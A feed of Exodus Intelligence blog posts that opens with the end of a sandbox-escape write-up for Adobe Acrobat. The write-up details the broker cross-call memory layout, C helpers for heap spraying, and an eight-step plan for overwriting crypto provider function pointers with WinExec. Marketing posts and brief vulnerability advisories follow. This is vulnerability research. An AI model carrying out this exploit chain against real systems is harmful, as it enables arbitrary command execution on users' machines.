The Adobe Acrobat broker provides the CryptReleaseContext() cross-call to the sandbox. This cross-call ends up calling CPReleaseContext(HCRYPTPROV + 0xe0, 0). By overwriting the CPReleaseContext() function pointer in HCRYPTPROV with WinExec() and by overwriting HCRYPTPROV + 0xe0 with a previously corrupted HCRYPTPROV object, one can execute WinExec with an arbitrary lpCmdLine argument, thereby executing arbitrary commands.

Shared Memory Structure – overwriting contiguous HCRYPTPROV objects.

In the following we describe the shared memory structure and more specifically how arguments for cross-calls are stored. The layout of the shared memory structure is relevant when the integer overflow is used to overwrite the function pointers in contiguous HCRYPTPROV objects.

The shared memory structure is shown below:

				
					Field                   Description
--------------------    --------------------------------------------------------------
Shared Memory Header    Contains main shared memory information like channel numbers.
Channel 0 Header        Contains main channel information like Event handles.
Channel 1 Header        Contains main channel information like Event handles.
...
Channel N Header        Contains main channel information like Event handles.
Channel 0               Channel memory zone, where the request/response is written.
Channel 1               Channel memory zone, where the request/response is written.
...
Channel N               Channel memory zone, where the request/response is written.
				
			

The shared memory main header is shown below:

				
					Offset      Length (bytes)    Field                   Description
---------   --------------    --------------------    -------------------------------------------
0x00           0x04           Channel number          Contains the number of channels available.
0x04           0x04           Unknown                 Unknown
0x08           0x08           Mutant HANDLE           Unknown
				
			

The channel main header data structure is shown below. The offsets are relative to the channel main header.

				
					Offset      Length (bytes)    Field                   Description
---------   --------------    --------------------    -------------------------------------------
0x00           0x08           Channel offset          Offset to the channel memory region for
                                                      storing/reading request relative to share
                                                      memory base address.
0x08           0x08           Channel state           Value representing the state of the channel:
                                                      1 Free, 2 in use by sandbox, 3 in use by broker.
0x10           0x08           Event Ping Handle       Event used by sandbox to signal broker that
                                                      there is a request in the channel.
0x18           0x08           Event Pong Handle       Event used by broker to signal sandbox that
                                                      there is a response in the channel.
0x20           0x08           Event Handle            Unknown
				
			

Since the shared memory is 2MB and the header is 0x10 bytes long and every channel header is 0x28 bytes long, every channel takes (2MB - 0x10 - N*0x28) / N bytes.
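
As a worked example of this formula (the channel count below is only illustrative; the actual number of channels used by the broker is not stated here):

// Per-channel size for a 2MB shared memory region with a 0x10-byte header and
// a 0x28-byte header per channel.
const N = 16;                                   // hypothetical number of channels
const channel_size = Math.floor((2 * 1024 * 1024 - 0x10 - N * 0x28) / N);
console.log(channel_size);                      // 131031 bytes per channel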

The shared memory channels are used to store the serialization of the cross-call input parameters and return values. Every channel memory region, located at shared_memory_address + channel_main_header[i].channel_offset, is implemented as the following data structure:

				
					Offset      Length (bytes)    Field                   Description
---------   --------------    --------------------    -----------------------------------------------
0x00           0x04           Tag ID                  Tag ID is used by the broker to dispatch the
                                                      request to the exposed cross-call.
0x04           0x04           In Out                  Boolean, if set the broker copy-back in the
                                                      channel the content of the arguments after the
                                                      cross-call. It is used when parameters are
                                                      output parameters, e.g. GetCurrentDirectory().
0x08           0x08           Unknown                 Unknown
0x10           0x04           Error Code              Windows Last Error set by the broker after the
                                                      cross-call to inform sandbox about error status.
0x14           0x04           Status                  Broker sets to 1 if the cross-call has been
                                                      executed otherwise it sets to 0.
0x18           0x08           HANDLE                  Handle returned by the cross call
0x20           0x04           Return Code             Exposed cross-call return value.
0x24           0x3c           Unknown                 Unknown
0x60           0x04           Args Number             Number of argument present in the cross-call
                                                      emitted by the sandbox.
0x64           0x04           Unknown                 Unknown
0x68           Variable       Arguments               Data structure representing every argument
[ Truncated ]
				
			

At most 20 arguments can be set for a request but only the required arguments need to be specified. It means that if the cross-call requires two arguments then Args Number will be set to 2 and the Arguments data structure contains two elements of the Argument type. Every argument uses the following data structure:

				
Offset     Length (bytes)    Field                   Description
---------  --------------    --------------------    --------------------------------------------------
0x0        4                 Argument type           Integer representing the argument type.
0x4        4                 Argument offset         Offset relative to the channel address, i.e. Tag
                                                     ID address, used to locate the argument value within the channel itself.
0x8        4                 Argument size           The argument's size.
				
			

The argument data structures must be followed by a terminator entry that contains only the offset field, set to a value past the last valid argument’s offset plus its size, i.e. argument[n].offset + argument[n].size + 1. Therefore, if a cross-call needs two arguments then three argument entries must be set: two representing the valid arguments to pass to the cross-call and a third marking where the arguments end.

Shown below is an example of the arguments in a two-argument cross-call:

				
Offset         Length (bytes)    Field
---------      --------------    --------------------
0x68           4                 Argument 0 type
0x6c           4                 Argument 0 offset
0x70           4                 Argument 0 size
0x74           4                 Argument 1 type
0x78           4                 Argument 1 offset
0x7c           4                 Argument 1 size
0x80           4                 Not Used
0x84           4                 Argument 1 offset + Argument 1 size + 1: 0x90 + N + M + 1
0x8c           4                 Not Used
0x90           N                 Argument 0 value
0x90 + N       M                 Argument 1 value
				
			
An Argument can be one of the following types:
				
Argument type       Argument name         Description
--------------      ------------------    -------------------------------------------------------------
0x01                WCHAR String          Specify a wide string.
0x02                DWORD                 Specify an int 32 bits argument.
0x04                QWORD                 Specify an int 64 bits argument.
0x05                INPTR                 Specify an input pointer, already instantiated on the broker.
0x06                INOUTPTR              Specify an argument treated as a pointer by the cross-call
                                          handler. It is used as an input or output pointer, e.g. to
                                          return a broker-valid memory pointer to the sandbox.
0x07                ASCII String          Specify an ASCII string argument.
0x08                0x18 Bytes struct     Specify a structure 0x18 bytes long.
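
To make the layout above concrete, the following is a minimal sketch, not Adobe's actual code, of how a sandboxed process could serialize a two-argument DWORD cross-call into a channel. Only the offsets (Tag ID at 0x00, Args Number at 0x60, argument entries at 0x68, first value at 0x90) and the terminator rule come from the tables; the helper and type names are assumptions.

/*
 * Hypothetical sketch of serializing a two-argument cross-call into a channel,
 * based on the channel and argument layouts documented above.
 */
#include <stdint.h>
#include <string.h>

#pragma pack(push, 1)
typedef struct {
    uint32_t type;    /* argument type, e.g. 0x02 = DWORD            */
    uint32_t offset;  /* offset of the value relative to the channel */
    uint32_t size;    /* size of the value in bytes                  */
} cc_argument_t;
#pragma pack(pop)

static void serialize_two_dwords(uint8_t *chan, uint32_t tag_id,
                                 uint32_t a, uint32_t b)
{
    cc_argument_t *args = (cc_argument_t *)(chan + 0x68);
    const uint32_t value_off = 0x90;            /* first value location */

    *(uint32_t *)(chan + 0x00) = tag_id;        /* Tag ID               */
    *(uint32_t *)(chan + 0x60) = 2;             /* Args Number          */

    args[0] = (cc_argument_t){ 0x02, value_off,     sizeof(a) };
    args[1] = (cc_argument_t){ 0x02, value_off + 4, sizeof(b) };
    /* Terminator entry: only the offset matters, set just past the
     * last valid argument's value (0x90 + 4 + 4 + 1). */
    args[2] = (cc_argument_t){ 0, value_off + 4 + 4 + 1, 0 };

    memcpy(chan + value_off,     &a, sizeof(a));
    memcpy(chan + value_off + 4, &b, sizeof(b));
}

After filling the channel like this, the sandbox would signal the broker through the Event Ping handle and wait for the corresponding Pong event, as described in the channel header table earlier.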
				
			

When an argument is of the INOUTPTR type (intended to be used for all non-primitive data types), then the cross-call handler treats it in the following way:

  1. Allocates 16 bytes where the first 8 bytes contain the argument size and the last 8 bytes the pointer received.
  2. If the argument is an input pointer for the final API then it is checked against a list of known-valid pointers before being passed as a parameter to the final API.
  3. If the argument is an output pointer for the final API then the pointer is allocated and filled by the final API.
  4. If the INOUT cross-call type is true then the pointer address is copied back to the sandbox.
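
As an illustration of the wrapper described in step 1, here is a minimal sketch of how a broker could handle an INOUTPTR argument. The function names and the validation helper are hypothetical; only the 16-byte size-plus-pointer layout and the input/output behavior come from the list above.

/*
 * Hypothetical sketch of the broker-side INOUTPTR wrapper: 16 bytes where
 * the first 8 bytes hold the argument size and the last 8 bytes the pointer.
 * broker_pointer_is_valid() stands in for the broker's real check against
 * its list of known-valid pointers.
 */
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>

typedef struct {
    uint64_t size;   /* first 8 bytes: argument size                  */
    void    *ptr;    /* last 8 bytes: pointer received or allocated   */
} inoutptr_wrapper_t;

static bool broker_pointer_is_valid(const void *ptr)
{
    /* Placeholder: the real broker walks a list of pointers it has
     * previously handed out to the sandbox. */
    return ptr != NULL;
}

static inoutptr_wrapper_t *wrap_inoutptr(void *received, uint64_t size,
                                         bool is_input)
{
    inoutptr_wrapper_t *w = malloc(sizeof(*w));   /* 16-byte wrapper */
    if (w == NULL)
        return NULL;

    w->size = size;
    if (is_input) {
        /* Input pointer: must already be known to the broker. */
        if (!broker_pointer_is_valid(received)) {
            free(w);
            return NULL;
        }
        w->ptr = received;
    } else {
        /* Output pointer: allocated here and filled by the final API. */
        w->ptr = malloc(size);
    }
    return w;
}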

Exploit Phases

The exploit consists of the following phases:

  1. Heap spraying – The sandbox process cross-calls CryptAcquireContext() N times in order to allocate multiple heap chunks of 0x100 bytes. The broker’s heap layout after the spray is shown below. A sketch of the broker-side CryptoAPI calls behind phases 1 and 3 follows this list.
Broker heap layout after spray
  2. Abuse Adobe Acrobat design – Since the HCRYPTPROV object is passed as a parameter to CryptAcquireContext(), the pointer must be returned to the sandbox in order to allow using it for operations with Crypto Providers in the broker context. Because of this behavior it is possible to find contiguous HCRYPTPROV objects.
  3. Holes creation – Release the contiguous chunks in an alternating fashion.
Creating holes in the broker process heap
  4. Import malicious key – The sandbox process cross-calls CryptImportKey() multiple times with a maliciously crafted key. It is expected that the key overflows into the next chunk, i.e. an HCRYPTPROV object. The overflow overwrites the initial bytes of the HCRYPTPROV object with a command string, CPGenRandom() with the address of ntdll!abs, and HCRYPTPROV + 0xe0 with a known value.
Overwriting the first HCRYPTPROV object
  5. Find overwritten object – The sandbox process cross-calls CryptGenRandom(). If it returns the known value then ntdll!abs() has been executed and the overwritten object has been found.
  6. Import malicious key – The sandbox process cross-calls CryptImportKey() multiple times with a maliciously crafted key. It is expected that the key overflows the next chunk, i.e. an HCRYPTPROV object. The overflow overwrites CPReleaseContext() with kernel32!WinExec(), CPGenRandom() with the address of ntdll!abs, and HCRYPTPROV + 0xe0 with the pointer to the object found in step 5.
Overwriting an HCRYPTPROV object a second time
  7. Find overwritten object – The sandbox process cross-calls CryptGenRandom(). If it returns the absolute value of the pointer found in step 5 then ntdll!abs() has been executed and the overwritten object has been found.
  8. Trigger – The sandbox process cross-calls CryptReleaseContext() on the HCRYPTPROV object found in step 7 to trigger WinExec().
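
For reference, the following sketch shows the broker-side CryptoAPI calls that phases 1 and 3 boil down to. In the exploit these calls are issued as cross-calls from the sandbox rather than invoked directly, and the spray count is an arbitrary illustrative value.

/*
 * Sketch of phases 1 and 3 using the CryptoAPI directly. In the exploit
 * these calls are reached through the cross-call channel; SPRAY_COUNT is
 * an assumption made for illustration.
 */
#include <windows.h>
#include <wincrypt.h>

#define SPRAY_COUNT 0x1000

static HCRYPTPROV providers[SPRAY_COUNT];

void spray_and_make_holes(void)
{
    /* Phase 1: each context acquisition allocates an HCRYPTPROV object
     * (a 0x100-byte chunk) on the broker heap. */
    for (int i = 0; i < SPRAY_COUNT; i++)
        CryptAcquireContextW(&providers[i], NULL, NULL,
                             PROV_RSA_FULL, CRYPT_VERIFYCONTEXT);

    /* Phase 3: release every other context to punch holes between the
     * remaining contiguous HCRYPTPROV objects. */
    for (int i = 0; i < SPRAY_COUNT; i += 2)
        CryptReleaseContext(providers[i], 0);
}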

Wrapping Up

We hope you enjoyed reading this. If you are hungry for more, make sure to check out our other blog posts.

The post Escaping Adobe Sandbox: Exploiting an Integer Overflow in Microsoft Windows Crypto Provider appeared first on Exodus Intelligence.

An Unpatched Vulnerability, A Substantial Liability

22 March 2023 at 11:00

An Unpatched Vulnerability, A Substantial Liability

Even the largest and most mature enterprises have trouble finding and patching vulnerabilities in a timely fashion. As we see in this article, challenges include getting patches pushed through a sophisticated supply chain and ultimately to a system whose end user may have devices configured to not allow automated remote patch application. We see this play out with every product that contains a line of code, from the simplest programs to large SaaS platforms with stringent performance, scalability, and availability requirements: patches need to be implemented at the earliest opportunity in order to avert catastrophe.

This plague of failing to patch vulnerabilities is infesting enterprises globally and is spreading like wildfire. It seems that nearly every day brings another breach, another company forced to spend millions reacting after the fact to a threat that may have been prevented. These attacks are often successful due to unpatched systems.  Victim companies that could have been proactive and taken measures to prevent these attacks now find themselves in the spotlight with a diminished reputation, the possibility of regulatory fines, and lost revenue. 

We see this pattern far too often and want to help. Exodus Intelligence’s new EVE (Exodus Vulnerability Enrichment) platform delivers real-time updates on the issues your security team needs to be worried about and helps you prioritize patches with our exclusive XI score, which shows you which vulnerabilities are most likely to be exploited in the wild. EVE combines insight regarding known vulnerabilities from our world-class researchers with supervised machine learning analysis and carefully curated public data to make the most actionable intelligence available in the quickest possible manner. 

EVE is a critical tool in the war against cyberattacks in the commercial sector, allowing companies to leverage the same Exodus data trusted by governments and agencies for more than a decade. Never let your business be put in the position of reacting to an attack, get EVE from Exodus Intelligence and be proactive rather than reactive.

About Exodus Intelligence

We provide clients with actionable information, capabilities, and context for proven exploitable vulnerabilities.  Our world-class team of vulnerability researchers discovers hundreds of exclusive Zero-Day vulnerabilities, providing our clients with this knowledge before the adversaries find them.  Our research also extends into the world of N-Day research, where we select critical N-Day vulnerabilities and complete research to prove whether these vulnerabilities are truly exploitable in the wild.  

For more information, visit www.exodusintel.com or contact [email protected] for further discussion.

The post An Unpatched Vulnerability, A Substantial Liability appeared first on Exodus Intelligence.

The Death Star Needed Vulnerability Intelligence

21 March 2023 at 20:55

The Death Star Needed Vulnerability Intelligence

Darth Vader and his evil colleagues aboard the Death Star could have seriously benefited from world-class vulnerability intelligence. Luckily for the Rebel Alliance, Vader was too focused on threat intelligence alone.

If you’ve ever seen the original Star Wars story, you might recall that the evil Empire was confident in their defensive intelligence as well as their seemingly impenetrable defensive systems. Their intel notified them of every X-Wing, pilot, and droid headed in their direction. They were flush with anti-aircraft turrets, TIE fighters, and lasers to attack those inbound threats. 

The Death Star was a fortress—right?

This approach to security isn’t unlike the networks and systems of many companies who have a vast amount of threat intelligence reporting on all known exploits in exceptional detail. Sometimes, though, lost in the noise of all the threats reported, there is a small opening. If exploited, that small opening can lead to a chain reaction of destruction. The Rebel Alliance attacked the one vulnerability they found—with tremendous results to show for it. 

Unfortunately, there are bad actors out there who are also looking to attack your systems, who can and will find a way to penetrate your seemingly robust defenses. Herein lies the absolute necessity of vulnerability intelligence. 

Exodus provides world-class vulnerability intelligence entrusted by government agencies and Fortune 500 companies. We have a team of world-class researchers with hundreds of years of combined experience, ready to identify your organization’s vulnerabilities; even the smallest of openings matter. With every vulnerability we detect, we neutralize thousands of potential exploits.

Learn more about our intelligence offerings and consider starting a trial:

For more information, visit www.exodusintel.com  or https://info.exodusintel.com/defense-offer-lp/ to see trial offers.

The post The Death Star Needed Vulnerability Intelligence appeared first on Exodus Intelligence.

Everything Old Is New Again

15 March 2023 at 15:00

Everything Old Is New Again,
Exodus Has A Solution

It is said that those who are ignorant of history are doomed to repeat it, and this article from CSO shows that assertion holds true in cybersecurity as well.  Threat actors are continuing to exploit vulnerabilities that have been known publicly since 2017 and earlier.  Compromised enterprises referenced in the article had five years or longer to patch or mitigate these vulnerabilities but failed to do so.  Rarely does a month go by without another article showcasing how companies are continually compromised through vulnerabilities for which patches have long been available.  Why does this keep happening?

Things are hard and vulnerability management is no exception.  Many enterprises manage tens, or hundreds, of thousands of hosts, each of which may have any number of vulnerabilities at any given time.  As you may well imagine, monitoring such a vast and dynamic attack surface can be tremendously challenging.  The vulnerability state potentially changes on each host with every application installed, patch applied, and configuration modified.  Given the numbers of vulnerabilities cited in the CSO article previously mentioned, tens of thousands of vulnerabilities reported per year and increasing, how can anything short of a small army ever hope to plug these critical infrastructure holes?

If you accept that there is no reasonable way to patch or mitigate every single vulnerability, then you must pivot to prioritizing vulnerabilities and managing a reasonable volume off the top, thereby minimizing risk in the context of available resources.  There are many ways to prioritize vulnerabilities, provided you have the necessary vulnerability intelligence to do so.  Filter out all vulnerabilities on platforms that do not exist in your environment.  Focus on those vulnerabilities that exist on public-facing hosts and then work inward.  As you are considering these relevant vulnerabilities, sort them by the likelihood of each being exploited in the wild.

Exodus Intelligence makes this type of vulnerability intelligence and much more available in our EVE (Exodus Vulnerability Enrichment) platform.  Input CPEs that exist within your environment into the EVE platform and see visualizations of vulnerability data that apply specifically to you.  We combine carefully curated public data with our own machine learning analysis and original research from some of the best security minds in the world and allow you to visualize and search it all.  You can also configure custom queries with results that you care about, schedule them to run on a recurring basis, and receive a notification when a vulnerability is published that meets your criteria.

About Exodus Intelligence

We provide clients with actionable information, capabilities, and context for proven exploitable vulnerabilities.  Our world-class team of vulnerability researchers discovers hundreds of exclusive Zero-Day vulnerabilities, providing our clients with this knowledge before the adversaries find them.  Our research also extends into the world of N-Day research, where we select critical N-Day vulnerabilities and complete research to prove whether these vulnerabilities are truly exploitable in the wild.  

 

For more information, visit www.exodusintel.com or contact [email protected] for further discussion.

The post Everything Old Is New Again appeared first on Exodus Intelligence.

CISA Urges Caution, One Year On From Invasion of Ukraine

8 March 2023 at 16:50

CISA Urges Caution, One Year On From Invasion of Ukraine

One year removed from Russia’s invasion of Ukraine, CISA has issued a warning to the United States and its European allies: increased cyber-attacks may be headed to your network.

 As tensions abroad remain high, the cyber landscape will be an extension of the physical battleground. More than ever, understanding where and how your organization is vulnerable is an essential part of risk management.

 At Exodus Intelligence, the leader in vulnerability intelligence, we seek to proactively understand your organization’s vulnerabilities, to assess the associated risk of those vulnerabilities, and to provide focused mitigation guidance based on our expert research.

 Rather than fighting thousands of threats individually, Exodus focuses on neutralizing thousands of potential exploits all at once, by addressing the root cause of your system’s vulnerabilities.

 Be sure to follow along with CISA alerts and advisories to remain vigilant on the developing threat landscape during this turbulent time. We have extensive coverage of the vulnerabilities in CISA’s Known Exploited Vulnerabilities catalog and provide mitigation guidance on those vulnerabilities to ensure your organization stays protected.

 Learn more about our product offerings and solutions to see how we can protect your organization:

 N-Day

 Zero-Day

 EVE

The post CISA Urges Caution, One Year On From Invasion of Ukraine appeared first on Exodus Intelligence.

Exodus Intelligence Launches EVE Vulnerability Intelligence Platform Targeting Commercial Enterprises

1 March 2023 at 16:03

Exodus Intelligence Launches EVE Vulnerability Intelligence Platform Targeting Commercial Enterprises

Today Exodus Intelligence is excited to announce EVE (Exodus Vulnerability Enrichment), our world-class vulnerability intelligence platform. EVE allows a wide range of security operations professionals to leverage Exodus’ state-level vulnerability research. This allows those professionals to prioritize mitigation and remediation efforts, enrich event data and incidents, be alerted to new noteworthy vulnerabilities relevant to their systems, and take advantage of many other available use cases valuable in defending their critical infrastructure.

EVE makes our robust intelligence available for the first time to enterprises for use in the defense of growing cyberattacks.  The API to the Exodus body of research enables us to provide simple, out of the box integration with SIEMs, SOARs, ticketing systems and other infrastructure components that can employ contextual data.  Additionally, it enables security operations teams to develop their own custom tooling and applications and integrate our vulnerability research.

Organizations with the ability to develop automation playbooks and other tools have been able to enrich available security data, enhance investigation and incident response capabilities, prioritize vulnerability remediation efforts, and more. We can now expand that capability and visibility to the rest of the security operations team with EVE. 

EVE provides users with an intuitive interface to Exodus’ intelligence corpus made up of original research, machine learning analysis, and carefully curated public data.  This interface includes regular automated updates to intelligence data, integration with environment-specific platform and vulnerability data, interactive visualizations that operationalize the research data for SOC analysts and risk management personnel, multidimensional search capability including filters which narrow results to only vulnerabilities that exist in the user’s environment and are likely to be exploited, and the ability to schedule searches to run on a recurring basis and email alerts to the user.

EVE capabilities include:

  • Dynamic, automated intelligence feed: Vulnerability research data is updated at minimum once per day with likelihood of a vulnerability to be exploited (XI Score), mitigation guidance, and other original research combined with curated public vulnerability data to maximize visibility of the attack surface.
  • Integration with the IT ecosystem: CPE data from vulnerability scans of the infrastructure can be input into EVE and applied as context to searches and visualizations keeping focus on relevant vulnerabilities.
  • Smart data visualization: The dashboard provides a wealth of information including a real-time likelihood that an existing vulnerability will be exploited in the environment, vulnerabilities grouped and sorted by categories such as attack vector or disclosure month, and which platforms in the environment have the most vulnerabilities. All visualizations are interactive allowing the user to drill into the vulnerability details making the data actionable.

About Exodus Intelligence

We provide clients with actionable information, capabilities, and context for proven exploitable vulnerabilities.  Our world-class team of vulnerability researchers discovers hundreds of exclusive Zero-Day vulnerabilities, providing our clients with this knowledge before the adversaries find them.  Our research also extends into the world of N-Day research, where we select critical N-Day vulnerabilities and complete research to prove whether these vulnerabilities are truly exploitable in the wild.  

For more information, visit www.exodusintel.com or contact [email protected] for further discussion.

The post Exodus Intelligence Launches EVE Vulnerability Intelligence Platform Targeting Commercial Enterprises appeared first on Exodus Intelligence.

Vulnerability Assessment Course – Spring 2023

17 February 2023 at 14:27

We are pleased to announce that the researchers of Exodus Intelligence will be providing publicly available training in person on March 28 2023 in Austin, TX.

The intermediate course, titled the Vulnerability Assessment Class, covers a wide range of vulnerability and exploitation related topics and is intended for the beginner to intermediate level practitioner. This course is intended to prepare the student to fully defend the modern enterprise by being aware and equipped to assess the impact of vulnerabilities across the breadth of the application space.

Attendees should plan to travel and arrive prior to Tuesday, March 28th. The course work will conclude on Friday, March 31st, 2023.

Since this training will be held in person, seating is limited.

**Later this year we will also be offering an updated version of our popular Vulnerability Development Master Class. This course will cover advanced topics such as dynamic reverse engineering, kernel exploitation concepts, browser exploitation, mitigation bypasses, and other topics. Later this year we will also be offering our Mobile Vulnerability Exploitation Class. This class will cover advanced topics concerning mobile platforms.

Vulnerability Assessment Class

This 4 day course is designed to provide students with a comprehensive and progressive approach to understanding vulnerability and exploitation topics on both the Linux and Windows platforms. Attendees will be immersed in hands-on exercises that impart valuable skills including a deep dive into the various types of vulnerabilities exploited today, static and dynamic reverse engineering, vulnerability discovery, and exploitation of widely deployed server and client-side applications. This class will cover a lot of material and move very quickly.

Prerequisites

      • Computer with the ability to run virtual machines (16GB+ memory recommended)

      • Some familiarity with debuggers, Python, C/C++, x86 ASM. IDA Pro or Ghidra experience a plus.

    • No prior vulnerability discovery experience is necessary

    Pricing and Registration

    The cost for the 4-day course is $4000 USD per student. You may register and pay below, or you can e-mail [email protected] to register and we will supply a purchase order.

     

    Syllabus

    Vulnerability and risk assessment

    • NDay risk and patching timelines
    • Vulnerability terminology: CVE, CVSS, CWE, Mitre Attack, Impact, Category
    • Risk assessment
    • Vulnerability mitigation

    Web-based vulnerabilities

    • Basics of HTTP
      • Format of HTTP request and response, URI
      • Command Injection and Directory Traversal attacks
      • Cross-site scripting and cross-site request forgery
    • XML External Entity attacks
    • Request Smuggling
    • SQL Injection
    • Deserialization

    Modules include examples of affected CVEs and practicals.

    Binary exploitation

    • Basics of binaries
      • Platforms: Linux and Windows
      • x86 assembly, PE, and ELF formats
      • Stack, Heap, Dynamic modules
      • PIE, ASLR, DEP
    • Tools
      • Ghidra, WinDBG, and gdb
    • Stack buffer overflow
      • OS/Theme: Linux
      • Return to shellcode, Return to libc, Stack pivot, etc.
      • Linux-based practical and demo
    • Use after free
      • OS/Theme: Windows
      • Overview of NT Heap, LFH
      • Practical and demo

    The post Vulnerability Assessment Course – Spring 2023 appeared first on Exodus Intelligence.

    Exodus Intelligence has been authorized by the CVE Program as a CVE Numbering Authority (CNA).

    15 February 2023 at 02:23

    Exodus Intelligence has been authorized by the CVE Program as a CVE Numbering Authority (CNA).

    Exodus Intelligence, the leader in Vulnerability Research, today announced it has been authorized by the CVE Program as a CVE Numbering Authority (CNA).  As a CNA, Exodus is authorized to assign CVE IDs to newly discovered vulnerabilities and publicly disclose information about these vulnerabilities through CVE Records.

    “Exodus is proud to be authorized as a CVE Numbering Authority which will allow us to work even more closely with the security community in identifying critically exploitable vulnerabilities,” said Logan Brown, Founder and CEO of Exodus.

    The CVE Program is sponsored by the Cybersecurity and Infrastructure Security Agency (CISA) of the U.S. Department of Homeland Security (DHS) in close collaboration with international industry, academic, and government stakeholders. It is an international, community-based effort with a mission to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. The discovered vulnerabilities are then assigned and published to the CVE List, which feeds the U.S. National Vulnerability Database (NVD). Exodus joins a global list of 269 trusted partners across 35 countries committed to strengthening the global cyber security community through discovering and sharing valuable cyber intelligence.

    About Exodus Intelligence

    Exodus employs some of the world’s most advanced reverse engineers and exploit developers to provide Government and Enterprise the unique ability to understand, prepare, and defend against the ever-changing landscape of Cyber Security. By providing customers with actionable Vulnerability Intelligence including deep vulnerability analysis, detection and mitigation guidance, and tooling to test defenses, our customers receive leading edge insights to harden their network or achieve mission success.

    The post Exodus Intelligence has been authorized by the CVE Program as a CVE Numbering Authority (CNA). appeared first on Exodus Intelligence.

    All-time High Cybersecurity Attrition + Economic Uncertainty = Happy(ish) New Year 

    19 January 2023 at 15:13

    All-time High Cybersecurity Attrition + Economic Uncertainty = Happy(ish) New Year

    As 2023 fires up, so do the attrition numbers across the Cybersecurity vertical.  With bonuses being paid and cybersecurity professionals searching for the next great job, vulnerability management teams are understaffed with growing concerns around finding qualified cybersecurity candidates to fill once occupied roles.  To amplify the situation, 2023 looks to be the year of ‘economic uncertainty’, sparking layoffs and budget contractions as companies brace for a potential recession.  These compounding factors put already overworked vulnerability management teams behind the curve as malicious threats become more frequent and more sophisticated. 

    Exodus Intelligence is here to help. 

    In response to the soaring attrition numbers and lack of qualified talent, Exodus Intelligence wants to help make vulnerability management teams more efficient.  Exodus is offering its N-Day vulnerability subscription for FREE for 1 month for all users registered no later than January 31st.  Exodus brings 300+ years of vulnerability research expertise and the trust of governments and Fortune 500 organizations to mitigate the most critical vulnerabilities in existence. Simply put – you receive 35 world-class researchers at no cost. 

    The N-Day Vulnerability subscription provides customers with intelligence about critically exploitable, publicly disclosed vulnerabilities on widely used software, hardware, embedded devices, and industrial control systems.  Every vulnerability is analyzed, documented, and enriched with high-impact intelligence derived by some of the best reverse engineers in the world. At times, vendor patches fail to properly secure the underlying vulnerability.  Exodus Intelligence’s proprietary research enhances patch management efforts. Subscribed customers have access to an arsenal of more than 1200 vulnerability intelligence packages to ensure defensive measures are properly implemented. 

    For those that are concerned about Zero-day vulnerabilities, Exodus is also offering the benefit of our Zero-day vulnerability subscription for up to 50% off for new registrations no later than January 31st.  Exodus’ Zero-day Subscription provides customers with critically exploitable vulnerability reports, unknown to the public, affecting widely used and relied upon software, hardware, embedded devices, and industrial control systems. Customers will gain access to a proprietary library of over 200 Zero-day vulnerability reports in addition to proof of concept exploits and highly enriched vulnerability intelligence packages. These Zero-day Vulnerability Intelligence packages, unavailable anywhere else, enable customers to reduce their mean time to detect and mitigate critically exploitable vulnerabilities. 

    These offerings are available to the United States (and allied countries) Private and Public Sectors to gain the immediate benefit of advanced vulnerability analysis, mitigation guidance/signatures, and proof-of-concepts to test against current defenses. 

    To register for FREE N-day Intelligence, please fill out the webform here 

    Sample Report

    The post All-time High Cybersecurity Attrition + Economic Uncertainty = Happy(ish) New Year appeared first on Exodus Intelligence.

    CloudLinux LVE kernel module (kmod-lve) Reference Counter Overflow

    13 January 2023 at 22:38

    EIP-ad32d249

    A local privilege escalation vulnerability exists in the CloudLinux Lightweight Virtualized Environment (LVE) kernel module due to an overflow of a reference counter. Successful exploitation allows an authenticated local user to escalate their privileges to root, whereas an unsuccessful exploit may cause a kernel panic. 

    Vulnerability Identifiers

    • Exodus Intelligence: EIP-ad32d249
    • MITRE: CVE-2022-0492

    Vulnerability Metrics

    • CVSSv2 Score: 6.6

    Vendor References

    Discovery Credit

    • Exodus Intelligence

    Disclosure Timeline

    • Disclosed to affected vendor: April 21st, 2022
    • Disclosed to public: January 13th, 2023

    Further Information

    Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

    Researchers who are interested in monetizing their 0Day and NDay can work with us through our Research Sponsorship Program (RSP).

    The post CloudLinux LVE kernel module (kmod-lve) Reference Counter Overflow appeared first on Exodus Intelligence.

    SonicWall SMA 500v and SMA 100 Series Firmware Heap Buffer Overflow

    12 January 2023 at 20:51

    EIP-6a6472ab

    A remote code execution vulnerability exists in SonicWall SMA 100 Series and SMA 500v Series due to a heap buffer overflow in the ‘extensionsetting’ endpoint. A remote, authenticated attacker can send crafted HTTP POST requests to execute code on vulnerable targets as the ‘nobody’ user.

    Vulnerability Identifiers

    • Exodus Intelligence: EIP-6a6472ab
    • MITRE: CVE-2022-2915

    Vulnerability Metrics

    • CVSSv2 Score: 6.0

    Vendor References

    Discovery Credit

    • Sergi Martinez (Exodus Intelligence)

    Disclosure Timeline

    • Disclosed to affected vendor: April 21st, 2022
    • Disclosed to public: January 12th, 2023

    Further Information

    Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

    Researchers who are interested in monetizing their 0Day and NDay can work with us through our Research Sponsorship Program (RSP).

    The post SonicWall SMA 500v and SMA 100 Series Firmware Heap Buffer Overflow appeared first on Exodus Intelligence.

    Schneider Electric SoMachine HVAC ActiveX Control Information Disclosure Vulnerability

    12 January 2023 at 20:39

    EIP-50a1e402

    An information disclosure vulnerability exists in Schneider Electric SoMachine HVAC due to a method in the ‘AxEditGrid3.ocx’ ActiveX control leaking a heap address of an ActiveX object. An attacker can entice a user to open a specially crafted web page to leak Internet Explorer process memory information.

    Vulnerability Identifiers

    • Exodus Intelligence: EIP-50a1e402
    • MITRE: CVE-2022-2988

    Vulnerability Metrics

    • CVSSv2 Score: 5.0

    Vendor References

    Discovery Credit

    • Exodus Intelligence

    Disclosure Timeline

    • Disclosed to affected vendor: December 10th, 2021
    • Disclosed to public: January 12th, 2023

    Further Information

    Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

    Researchers who are interested in monetizing their 0Day and NDay can work with us through our Research Sponsorship Program (RSP).

    The post Schneider Electric SoMachine HVAC ActiveX Control Information Disclosure Vulnerability appeared first on Exodus Intelligence.

    Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg

    19 December 2022 at 15:14

    By Sergi Martinez

    Overview

